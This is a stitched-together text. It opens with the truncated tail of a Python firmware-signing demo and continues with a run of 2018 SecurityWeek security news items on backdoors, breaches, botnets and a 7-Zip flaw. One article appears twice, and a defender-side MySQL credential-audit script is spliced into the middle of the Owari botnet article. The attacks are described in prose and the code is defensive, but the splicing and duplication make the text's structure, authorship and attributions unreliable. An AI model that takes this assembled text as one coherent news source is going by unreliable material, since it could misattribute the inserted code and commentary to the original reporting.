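VENDOR_SIGNING_KEY = b"constructed-vendor-signing-key"   # what a coerced insider holds
MAX_ATTEMPTS = 5                                         # stands in for rate limiting


def sign_firmware(image: bytes, key: bytes = VENDOR_SIGNING_KEY) -> bytes:
    """Vendor-side signing step (HMAC-SHA256 stand-in for a real signature)."""
    return hmac.new(key, image, hashlib.sha256).digest()


class SecureModule:
    """Tamper-resistant module holding the user-data key and its own firmware."""

    def __init__(self, password: str):
        self.salt = secrets.token_bytes(16)
        self.pw_hash = self._hash(password)
        self.data_key = secrets.token_bytes(32)   # the asset: wraps the disk key
        self.firmware = b"factory-firmware"
        self.failed_attempts = 0

    def _hash(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)

    def check_password(self, password: str) -> bool:
        """Constant-time compare; locks out after MAX_ATTEMPTS wrong guesses."""
        if self.failed_attempts >= MAX_ATTEMPTS:
            return False
        ok = hmac.compare_digest(self._hash(password), self.pw_hash)
        self.failed_attempts = 0 if ok else self.failed_attempts + 1
        return ok

    def update_firmware(self, image: bytes, signature: bytes,
                        password: Optional[str] = None, force: bool = False) -> str:
        # Gate 1: the image must be signed by the vendor key.
        if not hmac.compare_digest(sign_firmware(image), signature):
            return "rejected: bad signature"
        # Gate 2: a correctly signed image still needs the user's password.
        if password is not None and self.check_password(password):
            self.firmware = image
            return "updated: data key retained"
        # Escape hatch: the update can be forced, but only by destroying the
        # data key, so whoever holds the signing key gains the device, not the data.
        if force:
            self.data_key = None
            self.firmware = image
            return "updated: data key wiped"
        return "rejected: password required"


def demo() -> List[str]:
    """Walk a constructed device through the possible outcomes and return them."""
    device = SecureModule("correct horse battery staple")
    new_image = b"firmware-v2"
    good_sig = sign_firmware(new_image)                    # insider-signed image
    outcomes = [
        device.update_firmware(new_image, b"\x00" * 32),                 # bad signature
        device.update_firmware(new_image, good_sig),                     # no password
        device.update_firmware(new_image, good_sig, password="guess"),   # wrong password
        device.update_firmware(new_image, good_sig,
                               password="correct horse battery staple"),  # user consents
    ]
    forced = SecureModule("another user")
    outcomes.append(forced.update_firmware(new_image, good_sig, force=True))
    outcomes.append("data key wiped" if forced.data_key is None else "data key present")
    return outcomes


if __name__ == "__main__":
    for line in demo():
        print(line)
```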

Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, the United States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”

Federal Agencies Respond to 2017 Cybersecurity Executive Order
6.6.2018 securityweek BigBrothers

The U.S. Department of State, the Department of Homeland Security (DHS), the Department of Commerce, and the Office of Management and Budget (OMB) last week published reports in response to the cybersecurity executive order signed by President Donald Trump last year in an effort to improve the protection of federal networks and critical infrastructure against cyberattacks.

Department of State on deterring adversaries

The Department of State has published two reports with recommendations to President Trump on reducing the risk of cyber conflict, deterring malicious actors, maintaining an open and interoperable Internet, and protecting the country’s cyber interests through international cooperation.

The State Department believes the United States can deter both state and non-state actors using two approaches: improving the security of its networks, and through “cost imposition.”

The goal is to prevent cyberattacks that can be classified as use of force, and a long-lasting reduction of less serious destructive and disruptive activities that fall below the use of force threshold.

“The President already has a wide variety of cyber and non-cyber options for deterring and responding to cyber activities that constitute a use of force. Credibly demonstrating that the United States is capable of imposing significant costs on those who carry out such activities is indispensable to maintaining and strengthening deterrence,” the State Department’s report reads.

It adds, “With respect to activities below the threshold of the use of force, the United States should, working with like-minded partners when possible, adopt an approach of imposing swift, costly, and transparent consequences on foreign governments responsible for significant malicious cyber activities aimed at harming U.S. national interests.”

Criminal charges, prosecutions and sanctions can represent an efficient deterrent, but the government should make it clear to potential adversaries that they would face consequences if they engage in malicious cyber activities. However, these types of actions may not deter some threat actors, such as terrorists, in which case the solution is increasing the operational cost and complexity for the adversary to achieve its goal, the State Department said.

OMB report on cybersecurity risk determination

The Executive Office of the President through the OMB has published a Federal Cybersecurity Risk Determination Report and Action Plan, which assesses cybersecurity risk management capabilities across federal agencies and provides recommendations on addressing gaps.

An analysis of 96 civilian agencies showed that 71 of them had been assigned an “At Risk” or “High Risk” rating for their ability to identify, detect and respond to cyber incidents and recover from them.

“OMB and DHS also found that agencies are not equipped to determine how malicious actors seek to gain access to their information systems and data. This overall lack of timely threat information means agencies are spending billions of dollars on security capabilities without fully understanding the dangers they’re facing in the digital wild. This situation creates enterprise-wide gaps in network visibility, IT tool and capability standardization, and common operating procedures, all of which negatively impact Federal cybersecurity,” the OMB said in its report.

The OMB and DHS have detailed the actions required to address cybersecurity risks and say they have already started implementing them.

Department of Commerce and DHS on enhancing resilience against botnets

The Department of Commerce and DHS have published a report on enhancing the resilience of the Internet against botnets and other automated threats.

After collecting data on the matter, the agencies determined that international collaboration is needed due to many devices ensnared by botnets being located outside the U.S. They also believe this challenge can only be solved through collaboration between different stakeholders.

The organizations found that while the tools and processes required to address the problem exist, they are not applied in some market sectors due to various reasons, including budgets, lack of awareness, lack of incentives, and insufficient technical expertise.

“The recommended actions and options include ongoing activities that should be continued or expanded, as well as new initiatives. No single investment or activity can mitigate all threats, but organized discussions and stakeholder feedback will allow us to further evaluate and prioritize these activities based on their expected return on investment and ability to measurably impact ecosystem resilience,” reads the report from the DHS and the Department of Commerce.

DHS and Commerce on cybersecurity workforce

The DHS and the Commerce Department also published a report on supporting the growth and sustainment of the United States’ cybersecurity workforce.

According to the report, there had been nearly 300,000 cybersecurity-related job openings in the United States as of August 2017. The agencies believe veterans represent an underutilized workforce supply, and women and minorities are underrepresented in the field. They admit that while pay for cybersecurity roles is typically above average, the government pays cybersecurity staff below the level needed to attract the necessary talent.

“A successful cybersecurity workforce strategy for the Nation should include an enhanced focus upon the value of diversity and inclusion and convert it into a potent resource that can be used to great advantage. Fostering and sustaining a diverse workforce will support the ability to find new talent to carry out this effort and to uncover novel ways to solve problems. Integrating cyber security concepts into our primary and secondary education curricula will generate early interest in cyber security in a manner that cuts across all sectors of American society. Among workforce-aged adults, veterans, women, minorities, and the economically disadvantaged should be aggressively recruited, without compromising required standards,” the report reads.

Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, the United States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”

New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.2018 securityweek

A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.

The Iron group is known for the Iron ransomware (a rip-off of the Maktub malware) and is believed to have been active for around 18 months.

During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.

Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.

During installation, it checks if it runs in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks OS version and launches the backdoor based on the platform iteration.

The malware also checks whether Qihoo 360 products are present on the system and only proceeds if none is found. It also installs a malicious certificate as a root CA and uses it to sign the backdoor binary, then creates a service pointing back to the backdoor.

Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.

These include virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which targets Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (which dynamically calls external library functions while obfuscating the function name, thus making static analysis more difficult).

The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.

The extension constantly runs in the background as a stealthy host-based crypto-miner. Every minute, the malware checks whether Chrome is running, and can silently launch it if it isn’t.

The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.

If Qihoo 360 Safe Guard or Internet Security is found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.

The malware then decrypts shellcode that loads a Cobalt Strike beacon in memory and fetches a payload URL from a hardcoded Pastebin paste.

Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.

The Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets (it targets around 20 wallets).

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.

Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New macOS Mojave and iOS 12 software to be released later this year will also make it harder to use trackers to create "unique fingerprints" by gleaning data about the devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."

26 Million Users Hit by Ticketfly Hack
6.6.2018 securityweek Hacking

Ticketfly, the ticket distribution service owned by Eventbrite, has started restoring services after its website was defaced by a hacker who also gained access to user information.

The attack took place on or around May 30, when a hacker decided to exploit a vulnerability he had found in Ticketfly systems. The attacker, using the online moniker “IsHaKdZ,” reportedly asked the company to pay 1 bitcoin for information on the security hole. Since Ticketfly did not comply with his request, IsHaKdZ defaced ticketfly.com and the websites of several music venues.

The hacker also stole and leaked the details of Ticketfly customers and employees. Troy Hunt, the owner of the Have I Been Pwned data breach notification service, has analyzed the data and determined that over 26 million unique users are impacted. The compromised data includes email addresses, names, physical addresses and phone numbers.

The hack appears to have targeted Ticketfly’s WordPress-based assets. WordPress is also used for Ticketfly-powered websites provided to music venues, which would explain how the hacker managed to deface several sites.


Ticketfly says it has started restoring some of the affected services, including Box Office, Emailer, reporting, scanning, printing, and ticket purchasing systems.

“We’re rolling out a secure website solution as an alternative to your Ticketfly-powered site to meet your immediate needs. We’ve built a secure, non-WordPress based website solution with your existing domain, and your site will appear sometime today,” the company told customers in an updated FAQ.

The company has not shared too many details on the impact of the breach, but it has confirmed that names, addresses, email addresses, and phone numbers belonging to Ticketfly fans have been compromised.

“Our investigation into the incident is ongoing. It's critical that the information we share with you is accurate and backed by certainty. We are working with a team of forensic cybersecurity experts; the reality is cyber incidents are unique, and the investigations typically take more time than one would like because the full picture of what happened isn't always quick to develop,” Ticketfly said.

Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.

Many Drupal Sites Still Vulnerable to Drupalgeddon2 Attacks
6.6.2018 securityweek Attack

At least 115,000 websites powered by version 7 of the Drupal content management system are still vulnerable to Drupalgeddon2 attacks, despite patches being available since late March.

The flaw dubbed Drupalgeddon2 is officially tracked as CVE-2018-7600. It allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The issue has been patched since the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for Drupal 6, which is no longer supported since February 2016.

Drupalgeddon2 has been exploited by malicious actors for both server-side and client-side attacks that deliver cryptocurrency miners, backdoors, RATs and tech support scams.

Despite the high risk of attacks, many administrators of Drupal websites still haven’t applied the patches.

Researcher Troy Mursch has conducted an analysis of Drupal 7 websites – Drupal 7 is the most widely used version and it currently powers more than 830,000 sites – and found that many are still vulnerable.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running outdated and vulnerable versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version they had been using could not be determined.

“Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers,” Mursch wrote on his Bad Packets Report blog.

The list of vulnerable websites has not been made public, but the researcher did send it to US-CERT and the Drupal Security Team.

While conducting the analysis, Mursch discovered a significant cryptojacking campaign that leverages the Coinhive service. Malicious actors managed to compromise at least 258 Drupal sites and abused them to mine for cryptocurrency. The list of victims included the Attorney General’s Office in Colorado, a police department in Belgium, and Fiat-owned automotive parts manufacturer Magneti Marelli.

An India-based research organization hit by this campaign had updated Drupal, but it failed to remove the malicious code. As the Drupal Security Team warned, updating the CMS does not remove malicious code from already compromised websites.

This is the second cryptojacking campaign discovered by Mursch since the disclosure of Drupalgeddon2. In early May, he reported discovering more than 300 websites hacked in a similar operation, including sites belonging to universities and governments.

During the analysis of Drupalgeddon2, the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability, identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.

Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for Facetime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was initially noticed in iOS 11.3 beta, but later removed, only to be introduced in iOS 11.4 beta again.

With this new feature, an iPhone connected via USB to a computer (or to a USB accessory) will ask for the passcode every week, or it will lock down the Lightning port in charge-only mode, thus preventing access to the data.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of iOS 12 public beta, users will also take advantage of increased control over notifications, and will get detailed information on the time spent on the phone, courtesy of a new Screen Time feature. There’s also an App Limits feature to limit the time spent in an app, which gives parents more control over their children’s use of a mobile device.

IBM Adds New Features to MaaS360 with Watson UEM Product
6.6.2018 securityweek IT

IBM announced on Monday that it has added two new important features to its “MaaS360 with Watson” unified endpoint management (UEM) solution.

UEM solutions allow enterprise IT teams to manage smartphones, tablets, laptops and IoT devices in their organization from a single management console.

IBM has improved its MaaS360 with Watson UEM product with two capabilities the company says can be highly useful for IT departments: app intelligence and reporting, and security policy recommendations.

Business Dashboards for Apps is designed to provide administrators information on mobile applications and how they are used by employees. This can help them get a better understanding of which apps require attention and investment and which ones can be removed.

IT teams can obtain information on the number of installs (by platform, manufacturer and ownership), usage (popularity and session length), performance (crashes and data usage), and trend information (crashes, network requests and data consumption over a period of six months). Admins can also apply filters to make analysis easier and more useful.

The second new feature, the Policy Recommendation Engine, helps IT teams by dynamically providing recommendations when configuring security policies. Recommendations are provided based on the organization’s profile and common practices observed at similar companies in the MaaS360 community.

“Imagine a way to configure your policies with guidance that is dynamically presented every step of the way, catered to your organization and the size of your deployment. Whether you’re new to the game — or have been managing policies for years — a little confidence in your configurations goes a long way,” IBM Security’s John Harrington Jr. said in a blog post.

IBM also announced this week the launch of Guardium Analyzer, a new tool that uses a specialized data classification engine and data patterns to identify and classify GDPR-relevant information across cloud and on-premise systems. The tool can also identify the databases most likely to fail a GDPR-focused audit, the company said.

Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari botnet used default credentials on their command and control (C&C) server, thus allowing easy access to their database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server at IP 80(.)211(.)232(.)43 with port 3306, the default MySQL port, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it’s not that easy to make a MySQL database accessible from anywhere, let alone to secure it so poorly that anyone can connect to it.

Vess (Twitter, 11:08 PM - Jun 4, 2018):

It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666 …

Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible.

Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.

Unfortunately, although they gained write access to the MySQL databases, the researchers couldn’t disrupt the botnet, because C&C-related IPs usually have a short lifespan, as they tend to be flagged fast due to bad network traffic. Thus, they often change the IPs, and the two mentioned above are already offline.
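A defender-side audit of the two mistakes described above (a MySQL listener exposed to the Internet and a wildcard-host root:root account with global privileges), added here as an example and not NewSky Security's tooling; the my.cnf fragments and mysql.user rows are constructed, and the credential check assumes the mysql_native_password plugin:

```python
import hashlib
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Account:
    """One mysql.user row: user and host form the triplet together with the password."""
    user: str
    host: str
    plugin: str
    authentication_string: str
    global_privs: bool  # holds GRANT ... ON *.* (root-style access to every database)


def mysql_native_password_hash(password: str) -> str:
    """Hash stored by mysql_native_password: '*' + SHA1(SHA1(pw)) in upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def network_exposure(my_cnf: str) -> str:
    """Classify the [mysqld] listener: 'none', 'loopback', 'all', 'restricted' or 'unset'."""
    if re.search(r"^\s*skip[-_]networking\b", my_cnf, re.M):
        return "none"
    m = re.search(r"^\s*bind[-_]address\s*=\s*(\S+)", my_cnf, re.M)
    if not m:
        return "unset"  # the effective default depends on the build/distribution
    addr = m.group(1).strip("'\"")
    if addr in ("127.0.0.1", "::1", "localhost"):
        return "loopback"
    if addr in ("0.0.0.0", "*", "::"):
        return "all"
    return "restricted"


def audit_accounts(accounts: List[Account]) -> List[str]:
    """Flag wildcard hosts, anonymous users, empty or username-equals-password
    credentials (the root:root case), and global privileges reachable from anywhere."""
    findings = []
    for a in accounts:
        who = f"'{a.user}'@'{a.host}'"
        any_host = a.host == "" or "%" in a.host
        if a.user == "":
            findings.append(f"anonymous account {who}")
        if a.plugin == "mysql_native_password":
            trivial = {"", mysql_native_password_hash(""), mysql_native_password_hash(a.user)}
            if a.authentication_string in trivial:
                findings.append(f"empty or username-equals-password credential for {who}")
        if any_host and a.global_privs:
            findings.append(f"global privileges reachable from any host for {who}")
        elif any_host and a.user == "root":
            findings.append(f"root login permitted from any host for {who}")
    return findings


def audit(my_cnf: str, accounts: List[Account]) -> List[str]:
    """Combine the listener check with the account check into one findings list."""
    findings = audit_accounts(accounts)
    if network_exposure(my_cnf) == "all":
        findings.insert(0, "bind-address exposes port 3306 on every interface")
    return findings


# Constructed samples: the weak configuration beside a hardened one.
WEAK_MY_CNF = "[mysqld]\nbind-address = 0.0.0.0\n"
HARDENED_MY_CNF = "[mysqld]\nbind-address = 127.0.0.1\n"

WEAK_ACCOUNTS = [
    Account("root", "%", "mysql_native_password", mysql_native_password_hash("root"), True),
    Account("", "%", "mysql_native_password", "", False),
]
HARDENED_ACCOUNTS = [
    Account("root", "localhost", "mysql_native_password",
            mysql_native_password_hash("placeholder-long-random-secret"), True),
    Account("app", "10.0.0.5", "mysql_native_password",
            mysql_native_password_hash("placeholder-app-secret"), False),
]

if __name__ == "__main__":
    for label, cnf, accts in (("weak", WEAK_MY_CNF, WEAK_ACCOUNTS),
                              ("hardened", HARDENED_MY_CNF, HARDENED_ACCOUNTS)):
        print(label, network_exposure(cnf), audit(cnf, accts))
```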

Ankit Anubhav, Principal Researcher at NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that the cost of hiring the botnet is $60 per month, which buys “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.

Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

However, landave has found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim attached to an email, but this attack scenario required that the recipient manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.

Fortinet Acquires Bradford Networks to Extend Security to the Edge
6.6.2018 securityweek IT

Fortinet has acquired Boston-based network security firm Bradford Networks. The purpose is to extend Fortinet's micro segmentation to the new perimeter: that is, the IoT and mobile edge.

A Fortinet spokesperson told SecurityWeek that it paid approximately $17 million in initial consideration, net of cash acquired and subject to certain adjustments. It may pay an additional $2 million as an earn-out, subject to certain performance conditions. According to Crunchbase, Bradford had raised roughly $14 million in funding.

Gartner predicts that the currently estimated 4 billion enterprise connected devices will grow to 7.5 billion in the next two years. Making sure that every one of those devices is both known and secure is difficult. It is, suggests Fortinet in a blog, a 'classic' example of the asynchronous security problem: "Security managers need to secure every single device every single time, while criminals only need one open port, one compromised or unknown device, or one uncontained threat to circumvent all of the effort going into securing the network."

"As large organizations continue to see high growth in network traffic and the number of devices and users accessing their networks," explains Ken Xie, founder, chairman of the board and CEO at Fortinet, "the risk of breach increases exponentially. According to a recent Forrester study, 82 percent of companies surveyed are unable to even identify all devices accessing their networks. The integration of Bradford Networks' technology with Fortinet's security fabric enables large enterprises with the continuous visibility, micro-segmentation and access control technology they need to contain threats and block untrusted devices from accessing the network."

Bradford Networks enhances Fortinet's Security Fabric by providing agentless visibility of endpoints, users, devices, and applications that access the complete corporate network including headless devices and IoT. It brings security to IoT through device micro segmentation and automatic policy assignment, allowing granular isolation of unsecure devices.

Once visibility of all devices that connect to the network is attained, the next step is to make sure they are authenticated or authorized, and are subject to a context driven policy that defines who, what, when, and where connectivity is permitted.

"Such an approach -- where no unknown devices ever gain access to the corporate infrastructure, permitted devices are automatically segmented based on policies and roles, and connected devices that begin to behave badly are immediately quarantined from the network," says Fortinet, "becomes the foundation for a comprehensive positive security posture."

Fortinet's share price has grown steadily, from $35.83 in September 2017 to $62.48 at the start of 4 June 2018. A slight dip occurred with the Bradford Networks announcement (down to $61.70), but the share price has already risen above the pre-acquisition price to its highest ever value at $62.92, at the time of writing.

Fortinet does not expect the transaction to have a material impact on the company's second quarter or full year 2018 financial guidance disclosed on May 3, 2018.

Rob Scott, CEO at Bradford Networks, said, "We are excited to join with Fortinet, the leader in network security to deliver exceptional visibility and security at scale to large enterprise organizations. Bradford Networks' technology is already integrated with Fortinet's Security Fabric including FortiGate, FortiSIEM, FortiSwitch and FortiAP products to minimize the risk and impact of cyber threats in even the toughest security environments such as critical infrastructure - power, oil and gas and manufacturing."

Bradford Networks, the Fortinet spokesperson said, "will become part of the Fortinet brand and will enrich Fortinet’s IoT offering. The majority of Bradford Networks employees will transfer to Fortinet and be integrated across multiple functions based on areas of responsibilities."

Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

